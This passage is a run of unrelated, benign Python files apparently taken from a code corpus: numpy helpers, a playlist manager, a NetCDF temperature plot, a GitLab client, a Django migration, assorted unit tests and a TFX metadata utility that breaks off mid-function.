        2D data array whose columns the features are checked against.

    Returns
    -------
    bool
        True when X is an ndarray and every feature maps to a valid column.
    """
    # Bug fix: verify the type before touching ``X.shape`` -- previously a
    # non-array input without a ``shape`` attribute raised AttributeError
    # instead of returning False.
    if not isinstance(X, np.ndarray):
        return False
    if not all(d.isdigit() for d in features if isinstance(d, str)):
        return False
    _, ncols = X.shape
    ndarray_columns = np.arange(0, ncols)
    feature_cols = np.unique([int(d) for d in features])
    return all(np.in1d(feature_cols, ndarray_columns))

# Alias for closer name to isinstance and issubclass
hasndarrayintcolumns = has_ndarray_int_columns
def is_monotonic(a, increasing=True):
    """
    Tests whether a vector a has monotonicity.

    Parameters
    ----------
    a : array-like
        Array that should be tested for monotonicity

    increasing : bool, default: True
        Test if the array is montonically increasing, otherwise test if the
        array is montonically decreasing.
    """
    arr = np.asarray(a)  # ensure input is array-like

    if arr.ndim > 1:
        raise ValueError("not supported for multi-dimensonal arrays")

    if len(arr) <= 1:
        return True

    # Compare each adjacent pair in the requested direction.
    pairs_ok = arr[1:] >= arr[:-1] if increasing else arr[1:] <= arr[:-1]
    return np.all(pairs_ok, axis=0)
##########################################################################
## Numeric Computations
##########################################################################
#From here: http://stackoverflow.com/questions/26248654/numpy-return-0-with-divide-by-zero
def div_safe(numerator, denominator):
    """
    Ufunc-extension that returns 0 instead of nan when dividing numpy arrays

    Parameters
    ----------
    numerator: array-like

    denominator: scalar or array-like that can be validly divided by the numerator

    returns a numpy array

    example: div_safe( [-1, 0, 1], 0 ) == [0, 0, 0]
    """
    # Scalars are rejected outright -- the masking below needs an array result.
    if np.isscalar(numerator):
        raise ValueError("div_safe should only be used with an array-like numerator")

    # Divide with warnings silenced, then zero out every non-finite entry.
    with np.errstate(divide='ignore', invalid='ignore'):
        quotient = np.true_divide(numerator, denominator)
        quotient[~np.isfinite(quotient)] = 0  # -inf inf NaN
    return quotient
def prop_to_size(vals, mi=0.0, ma=5.0, power=0.5, log=False):
    """
    Converts an array of property values (e.g. a metric or score) to values
    that are more useful for marker sizes, line widths, or other visual
    sizes. The new sizes are computed as:

        y = mi + (ma - mi) * ((x_i - min(x)) / (max(x) - min(x))) ** power

    If ``log=True``, the natural logarithm of the property values is used instead.

    Parameters
    ----------
    vals : array-like, 1D
        An array of values of the property to scale between the size range.
        (Doc fix: this parameter was previously documented as ``prop``,
        which does not exist in the signature.)

    mi : float, default: 0.0
        The size to assign the smallest property (minimum size value).

    ma : float, default: 5.0
        The size to assign the largest property (maximum size value).

    power : float, default: 0.5
        Used to control how rapidly the size increases from smallest to largest.

    log : bool, default: False
        Use the natural logarithm to compute the property sizes

    Returns
    -------
    sizes : array, 1D
        The new size values, in the same shape as the input vals array
    """
    # ensure that vals is an array
    vals = np.asarray(vals)

    # apply natural log if specified
    if log:
        vals = np.log(vals)

    # avoid division by zero error when all values are identical
    delta = vals.max() - vals.min()
    if delta == 0.0:
        delta = 1.0

    return mi + (ma - mi) * ((vals - vals.min()) / delta) ** power
##########################################################################
## String Computations
##########################################################################
def slugify(text):
    """
    Returns a slug of given text, normalizing unicode data for file-safe
    strings. Used for deciding where to write images to disk.

    Parameters
    ----------
    text : string
        The string to slugify

    Returns
    -------
    slug : string
        A normalized slug representation of the text

    .. seealso:: http://yashchandra.com/2014/05/08/how-to-generate-clean-url-or-a-slug-in-python/
    """
    # Collapse every run of non-word characters to a space, then rebuild
    # the lowercased words joined by hyphens.
    words = re.sub(r'[^\w]+', ' ', text).lower().strip().split()
    return "-".join(words)
| nilq/baby-python | python |
import os
import random
class Playlist:
    # maintains individual playlist
    #
    # On-disk format: one clip per line as "card_no, clip_name"; lines
    # beginning with '#' accumulate into the description; blank lines are
    # ignored.
    def __init__(self, path):
        self.path = path
        self.clips = []  # list of (card_no, clip_name) string tuples
        n = os.path.basename(self.path).split(".")[:-1]
        self.name = ".".join(n)
        self.desc = ""

    def load(self):
        # each line has the format: "card_no, clip_name"
        # line starting with a hash (#) is part of the description
        with open(self.path) as pl:
            for line in pl:
                line = line.strip()
                if line.startswith("#"):
                    self.desc += line.strip('#')
                    continue
                if line == "":
                    continue
                if "," in line:
                    # Bug fix: split on the FIRST comma only. Previously every
                    # comma split the line and only fields 0 and 1 were kept,
                    # silently truncating clip names that contain commas and
                    # breaking the save()/load() round-trip.
                    idx, cl = line.split(",", 1)
                    self.clips.append((idx.strip(), cl.strip()))
                else:
                    print("Unknown line format in {}".format(self.path))

    def delete(self):
        # Remove the backing file; the in-memory object stays usable.
        os.remove(self.path)

    def rename(self, name):
        # Rename the backing file and refresh the display name.
        new = os.path.join(os.path.dirname(self.path), name)
        os.rename(self.path, new)
        self.path = new
        n = name.split(".")[:-1]
        self.name = ".".join(n)

    def save(self):
        # Write the description as comment lines, then one clip per line.
        with open(self.path, 'w+') as pl:
            desc = self.desc.replace("\n", "\n#")
            pl.write("#{}\n\n".format(desc))
            for idx, cl in self.clips:
                pl.write("{}, {}\n".format(idx, cl))

    def addClip(self, idx, clip):
        self.clips.append((idx, clip))

    def removeClipAt(self, idx):
        # remove clip at the specified (1-based) position of the clip list
        del self.clips[idx-1]

    def removeClip(self, cardid, clipname):
        # remove clip using card no and clip name
        try:
            idx = self.clips.index((cardid, clipname))
        except ValueError:
            # this shouldn't happen, perhaps we should
            # raise a warning?
            return
        del self.clips[idx]

    def shuffle(self):
        random.shuffle(self.clips)
class PlaylistContainer:
    # maintains all the playlists
    #
    # Discovers ``.pl`` files in a directory and exposes list-level and
    # clip-level operations; most mutating methods persist to disk.
    def __init__(self, directory=None):
        # directory may also be supplied later via load()
        self.listdir = directory
        self.playlist_extension = ".pl"
        self.lists = []  # loaded Playlist instances

    def load(self, directory=None):
        # Scan the playlist directory (created if missing) and load every
        # playlist file found there.
        if directory:
            self.listdir = directory
        if self.listdir is None:
            raise ValueError("Playlist directory is not set.")
        if not os.path.isdir(self.listdir):
            os.mkdir(self.listdir)
        for f in os.listdir(self.listdir):
            if f.endswith(self.playlist_extension):
                hnd = Playlist(os.path.join(self.listdir, f))
                hnd.load()
                self.lists.append(hnd)

    def getIdByName(self, name):
        # Return the index of the playlist with this display name, or None.
        for i, l in enumerate(self.lists):
            if name == l.name:
                return i
        return None

    def getIdByPath(self, path):
        # Return the index of the playlist stored at this path, or None.
        for i, l in enumerate(self.lists):
            if path == l.path:
                return i
        return None

    def create(self, name):
        # Create and immediately persist a new empty playlist.
        if not name.endswith(self.playlist_extension):
            name += self.playlist_extension
        hnd = Playlist(os.path.join(self.listdir, name))
        hnd.save()
        self.lists.append(hnd)
        return hnd

    def rename(self, playlistid, name):
        # Ensure the extension is kept when renaming the backing file.
        if not name.endswith(self.playlist_extension):
            name += self.playlist_extension
        self.lists[playlistid].rename(name)

    def addClip(self, playlistid, cardid, clipname):
        # NOTE: does not save -- callers must persist via save().
        self.lists[playlistid].addClip(cardid, clipname)

    def name(self, playlistid):
        return self.lists[playlistid].name

    def getDesc(self, playlistid):
        return self.lists[playlistid].desc

    def setDesc(self, playlistid, d):
        # Update the description and persist immediately.
        self.lists[playlistid].desc = d
        self.lists[playlistid].save()

    def clips(self, playlistid):
        return self.lists[playlistid].clips

    def save(self, playlistid=None):
        # if no playlist id is given, save all
        if playlistid is None:
            for l in self.lists:
                l.save()
        else:
            self.lists[playlistid].save()

    def removeClip(self, playlistid, cardid, name):
        # Remove one clip and persist the change right away.
        self.lists[playlistid].removeClip(cardid, name)
        self.save(playlistid)

    def remove(self, playlistid):
        # Delete the playlist file from disk and drop it from the container.
        self.lists[playlistid].delete()
        del self.lists[playlistid]

    def count(self, playlistid=None):
        # if playlist id is given, return clips count of it
        # if no playlist id is given, return playlists count
        if playlistid is None:
            return len(self.lists)
        else:
            return len(self.lists[playlistid].clips)

    def updateOrder(self, playlistid, newlist):
        # Replace the clip ordering after validating that newlist contains
        # only clips already present; persists on success.
        # sanity check
        if len(newlist) != self.count(playlistid):
            print("Playlist UO: length mismatch.")
            return False
        for newitem in newlist:
            if newitem not in self.lists[playlistid].clips:
                print("Playlist UO: {} not in {}".format(newitem, self.name(playlistid)))
                return False
        self.lists[playlistid].clips = newlist
        self.save(playlistid)
        return True
| nilq/baby-python | python |
# -*- coding: utf-8 -*-
# Copyright (C) SME Virtual Network contributors. All rights reserved.
# See LICENSE in the project root for license information.
| nilq/baby-python | python |
# -*- coding: utf-8 -*-
"""
Created on Fri Nov 6 14:07:32 2020

Plots the first day's average temperature from a NetCDF file on a
Mercator map roughly covering South and East Asia.
"""

from netCDF4 import Dataset
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap

# NOTE(review): hard-coded absolute path -- adjust for your machine.
data = Dataset(r"C:\Users\Jiacheng Li\Desktop\Study\University of Birmingham Relevant\Final Year Project\NetCDF_Handling\NetCDF_data\1980.nc", "r")

# Coordinate axes and the average-temperature variable.
lats = data.variables["lat"][:]
lons = data.variables["lon"][:]
time = data.variables["time"][:]
tave = data.variables["tave"][:]

mp = Basemap(projection="merc",
             llcrnrlon=65.8,
             llcrnrlat=-2,
             urcrnrlon=145.37,
             urcrnrlat=38.78,
             resolution="i")

# Project the lat/lon grid into map coordinates.
lon, lat = np.meshgrid(lons, lats)
x, y = mp(lon, lat)

# Plot the first time slice (index 0 = 01-01-1980).
colorMap = mp.pcolor(x, y, np.squeeze(tave[0, :, :]), cmap="rainbow")
mp.drawcoastlines()
mp.drawstates()
mp.drawcountries()
char = mp.colorbar(colorMap, location="right", pad="10%")

# Typo fix: "Temparature" -> "Temperature" in the displayed title.
plt.title("Average Temperature on 01-01-1980")
plt.show()

# Release the NetCDF file handle (previously leaked).
data.close()
| nilq/baby-python | python |
from __future__ import absolute_import
from requests.exceptions import HTTPError
from six.moves.urllib.parse import quote
from sentry.http import build_session
from sentry_plugins.exceptions import ApiError
class GitLabClient(object):
    """Minimal GitLab v3 REST client used by the Sentry GitLab plugin."""

    def __init__(self, url, token):
        self.url = url
        self.token = token

    def request(self, method, path, data=None, params=None):
        """Issue an authenticated request and return the decoded JSON body.

        HTTP errors are translated into ApiError so callers never see the
        underlying requests exception.
        """
        session = build_session()
        send = getattr(session, method.lower())
        try:
            resp = send(
                url='{}/api/v3/{}'.format(self.url, path.lstrip('/')),
                headers={'Private-Token': self.token},
                json=data,
                params=params,
                allow_redirects=False,
            )
            resp.raise_for_status()
        except HTTPError as e:
            raise ApiError.from_response(e.response)
        return resp.json()

    def auth(self):
        """Return the authenticated user, validating the token."""
        return self.request('GET', '/user')

    def get_project(self, repo):
        return self.request('GET', '/projects/{}'.format(quote(repo, safe='')))

    def get_issue(self, repo, issue_id):
        """Fetch a single issue by its project-local iid."""
        try:
            matches = self.request(
                'GET',
                '/projects/{}/issues'.format(quote(repo, safe='')),
                params={
                    # XXX(dcramer): this is an undocumented API
                    'iid': issue_id,
                },
            )
            return matches[0]
        except IndexError:
            raise ApiError('Issue not found with ID', 404)

    def create_issue(self, repo, data):
        return self.request(
            'POST',
            '/projects/{}/issues'.format(quote(repo, safe='')),
            data=data,
        )

    def create_note(self, repo, global_issue_id, data):
        """Attach a note (comment) to an issue, addressed by global id."""
        path = '/projects/{}/issues/{}/notes'.format(
            quote(repo, safe=''),
            global_issue_id,
        )
        return self.request('POST', path, data=data)

    def list_project_members(self, repo):
        return self.request(
            'GET',
            '/projects/{}/members'.format(quote(repo, safe='')),
        )
| nilq/baby-python | python |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-05-06 04:34
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated squashed migration (Django 1.9.6). Creates the coding
    # app's Assignment, Code, CodeScheme, CommentCodeInstance and
    # SubmissionCodeInstance models plus their relations. Field definitions
    # are generated -- do not hand-edit; create a new migration instead.

    # This squash replaces the three original coding migrations.
    replaces = [(b'coding', '0001_initial'), (b'coding', '0002_auto_20160506_0424'), (b'coding', '0003_auto_20160506_0427')]

    initial = True

    dependencies = [
        ('main', '0001_squashed_0001_initial'),
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Assignment',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created_date', models.DateTimeField(auto_now_add=True, null=True)),
                ('modified_date', models.DateTimeField(auto_now=True, null=True)),
                ('deleted_date', models.DateTimeField(blank=True, null=True)),
                ('name', models.CharField(max_length=64)),
                ('description', models.TextField(blank=True, null=True)),
                ('assigned_comments', models.ManyToManyField(blank=True, to=b'main.Comment')),
                ('assigned_submissions', models.ManyToManyField(blank=True, to=b'main.Submission')),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='Code',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created_date', models.DateTimeField(auto_now_add=True, null=True)),
                ('modified_date', models.DateTimeField(auto_now=True, null=True)),
                ('deleted_date', models.DateTimeField(blank=True, null=True)),
                ('name', models.CharField(max_length=64)),
                ('description', models.TextField(blank=True, null=True)),
                ('css_class', models.CharField(blank=True, max_length=64, null=True)),
                ('key', models.CharField(blank=True, max_length=1, null=True)),
                ('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='code_created_by', to=settings.AUTH_USER_MODEL)),
                ('deleted_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='code_deleted_by', to=settings.AUTH_USER_MODEL)),
                ('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='code_modified_by', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='CodeScheme',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created_date', models.DateTimeField(auto_now_add=True, null=True)),
                ('modified_date', models.DateTimeField(auto_now=True, null=True)),
                ('deleted_date', models.DateTimeField(blank=True, null=True)),
                ('name', models.CharField(max_length=64)),
                ('description', models.TextField()),
                ('mutually_exclusive', models.BooleanField(default=False)),
                ('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='codescheme_created_by', to=settings.AUTH_USER_MODEL)),
                ('deleted_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='codescheme_deleted_by', to=settings.AUTH_USER_MODEL)),
                ('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='codescheme_modified_by', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='CommentCodeInstance',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created_date', models.DateTimeField(auto_now_add=True, null=True)),
                ('modified_date', models.DateTimeField(auto_now=True, null=True)),
                ('deleted_date', models.DateTimeField(blank=True, null=True)),
                ('assignment', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='coding.Assignment')),
                ('code', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='coding.Code')),
                ('comment', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.Comment')),
                ('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='commentcodeinstance_created_by', to=settings.AUTH_USER_MODEL)),
                ('deleted_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='commentcodeinstance_deleted_by', to=settings.AUTH_USER_MODEL)),
                ('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='commentcodeinstance_modified_by', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='SubmissionCodeInstance',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created_date', models.DateTimeField(auto_now_add=True, null=True)),
                ('modified_date', models.DateTimeField(auto_now=True, null=True)),
                ('deleted_date', models.DateTimeField(blank=True, null=True)),
                ('assignment', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='coding.Assignment')),
                ('code', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='coding.Code')),
                ('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='submissioncodeinstance_created_by', to=settings.AUTH_USER_MODEL)),
                ('deleted_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='submissioncodeinstance_deleted_by', to=settings.AUTH_USER_MODEL)),
                ('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='submissioncodeinstance_modified_by', to=settings.AUTH_USER_MODEL)),
                ('submission', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.Submission')),
            ],
            options={
                'abstract': False,
            },
        ),
        # Remaining operations wire up foreign keys / M2Ms added after the
        # initial CreateModel statements.
        migrations.AddField(
            model_name='code',
            name='scheme',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='coding.CodeScheme'),
        ),
        migrations.AddField(
            model_name='assignment',
            name='code_schemes',
            field=models.ManyToManyField(to=b'coding.CodeScheme'),
        ),
        migrations.AddField(
            model_name='assignment',
            name='coder',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='assignment',
            name='created_by',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='assignment_created_by', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='assignment',
            name='deleted_by',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='assignment_deleted_by', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='assignment',
            name='modified_by',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='assignment_modified_by', to=settings.AUTH_USER_MODEL),
        ),
    ]
| nilq/baby-python | python |
import json
from nebulo.sql.reflection.function import reflect_functions
from sqlalchemy.dialects.postgresql import base as pg_base
CREATE_FUNCTION = """
create table account(
id int primary key,
name text
);
insert into account (id, name)
values (1, 'oli');
create function get_account(id int)
returns account
as $$
select (1, 'oli')::account;
$$ language sql;
"""
def test_reflect_function_returning_row(engine, session):
    """A reflected SQL function returning a composite executes; the row
    arrives as unparsed text."""
    session.execute(CREATE_FUNCTION)
    session.commit()
    reflected = reflect_functions(engine, schema="public", type_map=pg_base.ischema_names)
    account_fn = reflected[0]
    row = session.execute(account_fn.to_executable([1])).first()
    print(row)
    # psycopg2 does not know how to deserialize row results
    assert row == ("(1,oli)",)
def test_integration_function(client_builder):
    # End-to-end check: the SQL function is exposed as a GraphQL mutation,
    # returning the row plus the relay-style clientMutationId passthrough.
    client = client_builder(CREATE_FUNCTION)
    query = """
    mutation {
        getAccount(input: {id: 1, clientMutationId: "abcdef"}) {
            cmi: clientMutationId
            out: result {
                nodeId
                id
            }
        }
    }
    """
    with client:
        resp = client.post("/", json={"query": query})
        result = json.loads(resp.text)
        print(result)
        assert resp.status_code == 200
        assert result["errors"] == []
        # The returned row must carry both the plain id and the opaque nodeId.
        assert result["data"]["getAccount"]["out"]["id"] == 1
        assert result["data"]["getAccount"]["out"]["nodeId"] is not None
        assert result["data"]["getAccount"]["cmi"] == "abcdef"
| nilq/baby-python | python |
# code modified from https://stackoverflow.com/questions/38401099/how-to-count-one-specific-word-in-python/38401167
import re

# Count occurrences of every whitespace-separated word in a text file.
filename = input('Enter file:')  # you can input any .txt file here. you need to type the path to the file.
# you can try the file in this folder: text_diamond.txt

# Use a context manager so the file handle is always closed
# (the original opened the file and never closed it).
counts = dict()
with open(filename, 'r') as handle:
    for word in handle.read().split():
        if word not in counts:
            counts[word] = 1
        else:
            counts[word] += 1
print(counts)

# print only the count for my_word instead of iterating over entire dictionary
#my_word = "Shine"
# print(my_word, counts[my_word])
| nilq/baby-python | python |
from django.urls import path
from . import views

# URL routes for the store app: home page plus the auth pages.
urlpatterns = [
    path('', views.index, name='store-home-page'),
    path('login/', views.login, name='login-page'),
    path('signup/', views.signup, name='signup-page'),
]
| nilq/baby-python | python |
# Read N and a list of integers, then report the smallest value and the
# position (index) of its first occurrence among the first N entries.
quantidade = int(input())
valores = list(map(int, input().split()))
menor, pos = valores[0], 0
for indice in range(1, quantidade):
    if valores[indice] < menor:
        menor, pos = valores[indice], indice
print(f"Menor valor: {menor}")
print(f"Posicao: {pos}")
| nilq/baby-python | python |
"""
Utilities Tests
---------------
"""
from poli_sci_kit import utils
def test_normalize():
    # Normalized weights must sum to unity.
    total = sum(utils.normalize([1, 2, 3, 4, 5]))
    assert total == 1.0
def test_gen_list_of_lists():
    # Nine elements split into three triples.
    flat = [0, 1, 2, 3, 4, 5, 6, 7, 8]
    expected = [[0, 1, 2], [3, 4, 5], [6, 7, 8]]
    assert utils.gen_list_of_lists(original_list=flat, new_structure=[3, 3, 3]) == expected
def test_gen_faction_groups():
    # Elements regrouped according to the given faction index lists.
    members = ["a", "b", "c", "d", "e", "f"]
    grouped = utils.gen_faction_groups(
        original_list=members, factions_indexes=[[0, 1, 5], [2, 3, 4]]
    )
    assert grouped == [["a", "b", "f"], ["c", "d", "e"]]
def test_semiscirled_parl_plot(allocations):
    # Two-row semicircle layout: check row assignment and seat order
    # within each row, then that the speaker's seat sits at the origin.
    assert list(
        utils.gen_parl_points(
            allocations=allocations, style="semicircle", num_rows=2, speaker=False,
        )["row"]
    ) == [0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]

    assert list(
        utils.gen_parl_points(
            allocations=allocations, style="semicircle", num_rows=2, speaker=False,
        )["row_position"]
    ) == [0, 1, 2, 3, 4, 5, 6, 7, 8, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]

    test_df = utils.gen_parl_points(
        allocations=allocations, style="semicircle", num_rows=2, speaker=True,
    )
    # With speaker=True the last generated seat is the speaker's, at (0, 0).
    assert test_df["x_loc"][len(test_df) - 1] == 0
    assert test_df["y_loc"][len(test_df) - 1] == 0
def test_rectangle_parl_plot(allocations):
    # Four-row rectangle layout: five seats per row, in row-major order.
    assert list(
        utils.gen_parl_points(
            allocations=allocations, style="rectangle", num_rows=4, speaker=False,
        )["row"]
    ) == [0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 3, 3, 3, 3, 3]

    assert list(
        utils.gen_parl_points(
            allocations=allocations, style="rectangle", num_rows=4, speaker=False,
        )["row_position"]
    ) == [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 0, 1, 2, 3, 4]

    test_df = utils.gen_parl_points(
        allocations=allocations, style="rectangle", num_rows=4, speaker=True,
    )
    # With speaker=True the last generated seat is the speaker's, at (0, 4).
    assert test_df["x_loc"][len(test_df) - 1] == 0
    assert test_df["y_loc"][len(test_df) - 1] == 4
def test_swap_parl_allocations(allocations):
    # Swapping the first two seats of row 0 must exchange their groups.
    layout = utils.gen_parl_points(
        allocations=allocations, style="rectangle", num_rows=4, speaker=False,
    )
    swapped = layout.copy()
    utils.swap_parl_allocations(df=swapped, row_0=0, pos_0=0, row_1=0, pos_1=1)
    assert layout["group"][0] == swapped["group"][1]
def test_hex_to_rgb():
    # White in hex maps to unit RGB components.
    rgb = utils.hex_to_rgb("#ffffff")
    assert rgb.get_value_tuple() == (1.0, 1.0, 1.0)
def test_rgb_to_hex():
    # Unit RGB components map back to white in hex.
    white = (1.0, 1.0, 1.0)
    assert utils.rgb_to_hex(white) == "#ffffff"
def test_scale_saturation():
    # Saturation scaling multiplies each channel by the factor.
    scaled = utils.scale_saturation((1, 1, 1), 0.95)
    assert scaled == (0.95, 0.95, 0.95)
| nilq/baby-python | python |
from tark import constants
class DBSettings(object):
    """Container for database connection settings.

    Builds a ``db_configuration`` mapping (user/password/host plus any
    extra keyword arguments) suitable for handing to a DB driver, and
    exposes all settings flat via :meth:`get_settings`.
    """

    def __init__(self,
                 db_type=constants.DEFAULT_DB_TYPE,
                 db_name=constants.DEFAULT_DB_NAME,
                 db_user=constants.DEFAULT_DB_USER,
                 db_password=constants.DEFAULT_DB_PASSWORD,
                 db_node=constants.DEFAULT_DB_NODE,
                 **kwargs):
        self.db_type = db_type
        self.db_name = db_name
        # db specific config parameters
        self.db_user = db_user
        self.db_password = db_password
        self.db_node = db_node
        self.extra_config = dict(**kwargs)
        # Only include credentials/host that were actually provided.
        provided = {"user": self.db_user,
                    "password": self.db_password,
                    "host": self.db_node}
        self.db_configuration = {key: value for key, value in provided.items()
                                 if value is not None}
        self.db_configuration.update(**self.extra_config)

    def get_settings(self):
        """Return every setting (extras merged in) as a flat dict."""
        return dict(db_type=self.db_type,
                    db_name=self.db_name,
                    db_user=self.db_user,
                    db_password=self.db_password,
                    db_node=self.db_node,
                    **self.extra_config)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# (C) 2011 Alan Franzoni. APL 2.0 licensed.
from unittest import TestCase
from abc import abstractmethod
from pydenji.ducktypes.function_copy import copy_raw_func_only, fully_copy_func
@abstractmethod
def example_func(a, b, c=1):
    # Copy target used by the tests below: three parameters (one with a
    # default), marked abstract so the tests can check how each copy
    # strategy treats the __isabstractmethod__ attribute.
    return 1
class AbstractTestFunctionCopy(object):
    # Shared assertions for both copy strategies; subclasses set
    # self.copy_func in setUp(). NOTE: written for Python 2
    # (func_code / assertEquals) -- do not "modernize" without
    # porting pydenji itself.

    def test_function_wrapper_preserves_function_arg_count(self):
        wrapped = self.copy_func(example_func)
        self.assertEquals(3, wrapped.func_code.co_argcount)

    def test_function_wrapper_preserves_function_return_value(self):
        wrapped = self.copy_func(example_func)
        self.assertEquals(1, wrapped(1,2))

    def test_wrapped_func_is_actually_a_copy(self):
        # Setting an attribute on the copy must not leak to the original.
        wrapped = self.copy_func(example_func)
        wrapped.someattribute = 3
        self.assertFalse(getattr(example_func, "someattribute", False))
class TestRaw(AbstractTestFunctionCopy, TestCase):
    # copy_raw_func_only: copies the code object but not function attributes.

    def setUp(self):
        self.copy_func = copy_raw_func_only

    def test_wrapped_function_is_never_abstract(self):
        # The raw copy must drop the @abstractmethod marker.
        wrapped = self.copy_func(example_func)
        self.assertFalse(getattr(wrapped, "__isabstractmethod__", False))
class TestCopyFuncFully(AbstractTestFunctionCopy, TestCase):
    # fully_copy_func: copies the code object and the function attributes.

    def setUp(self):
        self.copy_func = fully_copy_func

    def test_wrapped_function_abstract_attributes_are_copied(self):
        # The full copy keeps the @abstractmethod marker.
        wrapped = self.copy_func(example_func)
        self.assertTrue(wrapped.__isabstractmethod__)
| nilq/baby-python | python |
# Standard utils file
# Developed by Anodev Development (OPHoperHPO) (https://github.com/OPHoperHPO)
import time
import network
def wifi_connect(SSID, PASSWORD):
    """Connect to a wifi access point in station mode (MicroPython).

    Returns the active WLAN interface on success, or False if the
    connection is not established within ~30 seconds.
    """
    sta_if = network.WLAN(network.STA_IF)
    if not sta_if.isconnected():
        print('Connecting to network...')
        sta_if.active(True)
        sta_if.connect(SSID, PASSWORD)
        # Poll once per second with a 30 s timeout. (The original also
        # re-tested isconnected() inside the loop body, which was
        # redundant: the while condition already guarantees it.)
        timer = 30
        while not sta_if.isconnected():
            if timer == 0:
                return False
            time.sleep(1)
            timer -= 1
    print('Network config:', sta_if.ifconfig())
    return sta_if
| nilq/baby-python | python |
# Lint as: python3
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common MLMD utility libraries."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from typing import TypeVar
from absl import logging
from tfx.orchestration import metadata
import ml_metadata as mlmd
from ml_metadata.proto import metadata_store_pb2
MetadataType = TypeVar('MetadataType', metadata_store_pb2.ArtifactType,
metadata_store_pb2.ContextType,
metadata_store_pb2.ExecutionType)
def register_type_if_not_exist(
    metadata_handler: metadata.Metadata,
    metadata_type: MetadataType,
) -> MetadataType:
  """Registers a metadata type if not exists.

  Uses existing type if schema is superset of what is needed. Otherwise tries
  to register new metadata type.

  Args:
    metadata_handler: A handler to access MLMD store.
    metadata_type: The metadata type to register if does not exist.

  Returns:
    A MetadataType with id

  Raises:
    RuntimeError: If new metadata type conflicts with existing schema in MLMD.
    ValueError: If metadata type is not expected.
  """
  if metadata_type.id:
    # Already registered (MLMD assigned an id); nothing to do.
    return metadata_type
  # Select the get/put store handlers matching the concrete proto type.
  if isinstance(metadata_type, metadata_store_pb2.ArtifactType):
    get_type_handler = metadata_handler.store.get_artifact_type
    put_type_handler = metadata_handler.store.put_artifact_type
  elif isinstance(metadata_type, metadata_store_pb2.ContextType):
    get_type_handler = metadata_handler.store.get_context_type
    put_type_handler = metadata_handler.store.put_context_type
  elif isinstance(metadata_type, metadata_store_pb2.ExecutionType):
    get_type_handler = metadata_handler.store.get_execution_type
    put_type_handler = metadata_handler.store.put_execution_type
  else:
    raise ValueError('Unexpected value type: %s.' % type(metadata_type))

  try:
    # Types can be evolved by adding new fields in newer releases.
    # Here when upserting types:
